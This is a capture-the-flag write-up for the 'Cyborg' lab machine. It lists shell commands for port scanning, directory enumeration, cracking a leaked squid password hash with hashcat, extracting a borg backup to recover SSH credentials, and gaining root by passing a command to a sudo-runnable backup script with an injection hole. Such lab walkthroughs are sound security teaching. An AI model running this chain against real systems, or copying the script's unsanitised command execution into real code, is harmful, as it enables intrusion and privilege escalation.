My attack chain for Cyborg. Web content enumeration, Cracking a borg backup and some bash code reivew.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
|
export ip=<redacted>
# recon
nmap $ip
nmap $ip -sVC -p 22,80 -oN nmap-sVC-$ip.txt
# | Port | Service |
# | ---- | ------------------------------------ |
# | 22 | ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.10 |
# | 80 | http Apache httpd 2.4.18 |
# enumeration
gobuster dir --url $ip -w /usr/share/wordlists/SecLists/Discovery/Web-Content/common.txt
# --------------------------------------------------------------------
# /admin (Status: 301) [Size: 312] [--> http://10.10.239.18/admin/]
# /etc (Status: 301) [Size: 310] [--> http://10.10.239.18/etc/]
# /index.html (Status: 200) [Size: 11321]
http http://$ip/index.html > http.html
http http://$ip/admin/ > http$ip-admin.html
http http://$ip/etc/ > http$ip-etc.html
# exploitation - hashcat
http http://$ip/etc/squid/passwd | cut -d':' -f2 > squid-passwd.hash
hashcat squid-passwd.hash --show
hashcat -m 1600 squid-passwd.hash /usr/share/wordlists/rockyou.txt -o squid-passwd-solved.txt
hashcat squid-passwd.hash --show
# $apr1$BpZ.Q.1m$F0qqPwHSOG50URuOVQTTn.:s********
# exploitation - borg backups > ssh
wget http://$ip/admin/archive.tar
tar -xvf archive.tar
cd home/field/dev
borg list final_archive
borg extract home/field/dev/final_archive::music_archive #p:squidward
cat home/alex/Desktop/secret.txt
ssh alex@$ip #p:S3*******3
# privEsc: sudo script
sudo -l
cat /etc/mp3backups/backup.sh
sudo /etc/mp3backups/backup.sh -c "cat /root/root.txt"
|
backup.sh script utilized for privesc
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
|
#!/bin/bash
sudo find / -name "*.mp3" | sudo tee /etc/mp3backups/backed_up_files.txt
input="/etc/mp3backups/backed_up_files.txt"
#while IFS= read -r line
#do
#a="/etc/mp3backups/backed_up_files.txt"
# b=$(basename $input)
#echo
# echo "$line"
#done < "$input"
while getopts c: flag
do
case "${flag}" in
c) command=${OPTARG};;
esac
done
backup_files="/home/alex/Music/song1.mp3 /home/alex/Music/song2.mp3 /home/alex/Music/song3.mp3 /home/alex/Music/song4.mp3 /home/alex/Music/song5.mp3 /home/alex/Music/song6.mp3 /home/alex/Music/song7.mp3 /home/alex/Music/song8.mp3 /home/alex/Music/song9.mp3 /home/alex/Music/song10.mp3 /home/alex/Music/song11.mp3 /home/alex/Music/song12.mp3"
# Where to backup to.
dest="/etc/mp3backups/"
# Create archive filename.
hostname=$(hostname -s)
archive_file="$hostname-scheduled.tgz"
# Print start status message.
echo "Backing up $backup_files to $dest/$archive_file"echo
# Backup the files using tar.
tar czf $dest/$archive_file $backup_files
# Print end status message.
echo
echo "Backup finished"
cmd=$($command)
echo $cmd
|